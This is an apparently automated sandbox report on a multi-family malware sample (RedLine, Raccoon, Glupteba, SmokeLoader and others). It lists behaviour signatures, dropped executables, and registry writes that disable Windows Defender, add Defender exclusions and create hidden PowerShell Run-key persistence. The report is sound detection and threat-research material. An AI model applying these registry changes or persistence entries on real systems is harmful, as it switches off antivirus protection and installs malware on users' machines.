Malware Analysis Report

2025-08-10 21:53

Sample ID 231025-fgrqssfb41
Target e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae
SHA256 e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan upx rootkit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae

Threat Level: Known bad

The file e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae was found to be: Known bad.

Malicious Activity Summary

Glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect ZGRat V1

Raccoon

Windows security bypass

Detected google phishing page

RedLine payload

DcRat

Amadey

SmokeLoader

ZGRat

Raccoon Stealer payload

Glupteba payload

Modifies Windows Defender Real-time Protection settings

RedLine

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

UPX packed file

Checks BIOS information in registry

Reads user/profile data of web browsers

Unexpected DNS network traffic destination

Windows security modification

Checks computer location settings

Drops Chrome extension

Drops desktop.ini file(s)

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious behavior: CmdExeWriteProcessMemorySpam

Runs net.exe

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-25 04:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-25 04:50

Reported

2023-10-25 04:57

Platform

win7-20231023-en

Max time kernel

226s

Max time network

303s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FB51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\18A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1441.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B2E2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C135.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F753.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\317.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 51.159.66.125 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\B2E2.exe'\"" C:\Users\Admin\AppData\Local\Temp\B2E2.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\MyBurn\is-C510B.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-CNM1D.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-JV5IE.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-CGEMO.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
